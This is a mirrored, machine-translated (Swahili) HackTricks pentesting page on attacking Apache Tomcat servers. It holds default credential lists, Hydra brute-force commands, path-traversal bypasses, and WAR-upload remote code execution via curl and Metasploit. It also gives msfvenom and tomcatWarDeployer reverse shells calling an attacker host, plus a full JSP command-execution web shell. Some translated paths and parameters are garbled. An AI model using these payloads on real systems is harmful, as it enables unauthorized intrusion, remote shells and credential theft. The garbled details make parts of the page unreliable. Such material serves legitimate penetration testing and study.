Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-30 00:20:59 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/tomcat.md

11 KiB
Raw Blame History

Tomcat

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Kikundi cha Usalama cha Try Hard

{% embed url="https://discord.gg/tryhardsecurity" %}

Ugunduzi

  • Kawaida inaendeshwa kwenye bandari 8080
  • Kosa la Kawaida la Tomcat:

Uorodheshaji

Uthibitisho wa Toleo

Ili kupata toleo la Apache Tomcat, amri rahisi inaweza kutekelezwa:

curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat

Mahali pa Faili za Meneja

Kutambua maeneo sahihi ya /manager na /host-manager ni muhimu kwani majina yao yanaweza kubadilishwa. Tafutizo la nguvu linapendekezwa ili kutambua kurasa hizi.

Uorodhishaji wa Majina ya Mtumiaji

Kwa toleo la Tomcat la zamani kuliko 6, inawezekana kuorodhesha majina ya mtumiaji kupitia:

msf> use auxiliary/scanner/http/tomcat_enum

Majina ya mtumiaji na nywila za Chaguo-msingi

/manager/html directory ni hasa nyeti kwani inaruhusu kupakia na kutekeleza faili za WAR, ambazo zinaweza kusababisha utekelezaji wa nambari. Directory hii inalindwa na uthibitishaji wa HTTP wa msingi, na majina ya mtumiaji na nywila za kawaida ni:

  • admin:admin
  • tomcat:tomcat
  • admin:
  • admin:s3cr3t
  • tomcat:s3cr3t
  • admin:tomcat

Majina haya ya mtumiaji na nywila yanaweza jaribiwa kutumia:

msf> use auxiliary/scanner/http/tomcat_mgr_login

Directory nyingine inayostahili kuzingatiwa ni /manager/status, ambayo inaonyesha toleo la Tomcat na OS, ikisaidia kutambua udhaifu.

Shambulio la Brute Force

Kujaribu shambulio la nguvu kwenye directory ya meneja, mtu anaweza kutumia:

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html

Makosa Yanayojulikana

Kufichua Nyuma ya Neno la Siri

Kupata /auth.jsp kunaweza kufichua neno la siri katika nyuma ya neno la siri chini ya hali za bahati nzuri.

Ukodishaji wa URL Mara Mbili

Udhaifu wa CVE-2007-1860 katika mod_jk inaruhusu ukodishaji wa njia mara mbili wa URL, kuruhusu ufikiaji usiohalali kwenye kiolesura cha usimamizi kupitia URL iliyoundwa kwa makini.

Ili kupata wavuti ya usimamizi wa Tomcat enda: pathTomcat/%252E%252E/manager/html

/mifano

Toleo la Apache Tomcat 4.x hadi 7.x lina skripti za mfano ambazo zinaweza kufichua habari na kushambuliwa na mashambulizi ya msalaba wa tovuti (XSS). Skripti hizi, zilizoorodheshwa kwa kina, zinapaswa kuchunguzwa kwa ufikiaji usiohalali na uwezekano wa kutumiwa vibaya. Pata habari zaidi hapa

  • /mifano/jsp/num/numguess.jsp
  • /mifano/jsp/dates/date.jsp
  • /mifano/jsp/snp/snoop.jsp
  • /mifano/jsp/error/error.html
  • /mifano/jsp/sessions/carts.html
  • /mifano/jsp/checkbox/check.html
  • /mifano/jsp/colors/colors.html
  • /mifano/jsp/cal/login.html
  • /mifano/jsp/include/include.jsp
  • /mifano/jsp/forward/forward.jsp
  • /mifano/jsp/plugin/plugin.jsp
  • /mifano/jsp/jsptoserv/jsptoservlet.jsp
  • /mifano/jsp/simpletag/foo.jsp
  • /mifano/jsp/mail/sendmail.jsp
  • /mifano/servlet/HelloWorldExample
  • /mifano/servlet/RequestInfoExample
  • /mifano/servlet/RequestHeaderExample
  • /mifano/servlet/RequestParamExample
  • /mifano/servlet/CookieExample
  • /mifano/servlet/JndiServlet
  • /mifano/servlet/SessionExample
  • /tomcat-docs/appdev/sample/web/hello.jsp

Udanganyifu wa Njia

Katika mipangilio inayoweza kudhurika ya Tomcat unaweza kupata ufikiaji kwenye saraka zilizolindwa katika Tomcat kwa kutumia njia: /..;/

Kwa hivyo, kwa mfano, unaweza kupata ukurasa wa msimamizi wa Tomcat kwa kufikia: www.vulnerable.com/lalala/..;/manager/html

Njia nyingine ya kuzidi njia zilizolindwa kwa kutumia hila hii ni kufikia http://www.vulnerable.com/;param=value/manager/html

RCE

Hatimaye, ikiwa una ufikiaji kwenye Meneja wa Programu ya Wavuti ya Tomcat, unaweza kupakia na kutekeleza faili ya .war (utekelezaji wa nambari).

Vizuizi

Utaweza tu kutekeleza WAR ikiwa una mamlaka za kutosha (majukumu: admin, manager na manager-script). Maelezo hayo yanaweza kupatikana chini ya tomcat-users.xml kawaida iliyoainishwa katika /usr/share/tomcat9/etc/tomcat-users.xml (inatofautiana kati ya toleo) (angalia POST sehemu).

# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"

# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"

Metasploit

Metasploit is a powerful tool used for penetration testing. It provides a wide range of exploits, payloads, and auxiliary modules to help security professionals in the penetration testing process. Metasploit can be used to test the security of web applications, including those running on Apache Tomcat servers.

use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

MSFVenom Reverse Shell

  1. Unda war kwa ajili ya kupeleka:
msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
  1. Pakia faili ya revshell.war na ufikie (/revshell/):

Bind na reverse shell na tomcatWarDeployer.py

Katika hali fulani hii haifanyi kazi (kwa mfano toleo za zamani za sun)

Pakua

git clone https://github.com/mgeeky/tomcatWarDeployer.git

Kitanzi cha Nyuma

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

Bind shell

Shell ya Kufunga

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/

Kutumia Culsterd

clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows

Mbinu ya kawaida - Web shell

Tengeneza index.jsp na maudhui haya:

<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
}  catch(IOException e) {   e.printStackTrace();   }
}
%>
<pre><%=output %></pre>

mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it

Unaweza pia kusakinisha hii (inaruhusu kupakia, kupakua na utekelezaji wa amri): http://vonloesch.de/filebrowser.html

Mbinu ya Mikono 2

Pata ganda la wavuti la JSP kama hili na unda faili ya WAR:

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp

POST

Jina la faili ya siri ya Tomcat ni tomcat-users.xml

find / -name tomcat-users.xml 2>/dev/null

Njia nyingine za kukusanya sifa za Tomcat:

msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat

Vifaa vingine vya uchunguzi wa tomcat

Marejeo

Kikundi cha Usalama cha Try Hard

{% embed url="https://discord.gg/tryhardsecurity" %}

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!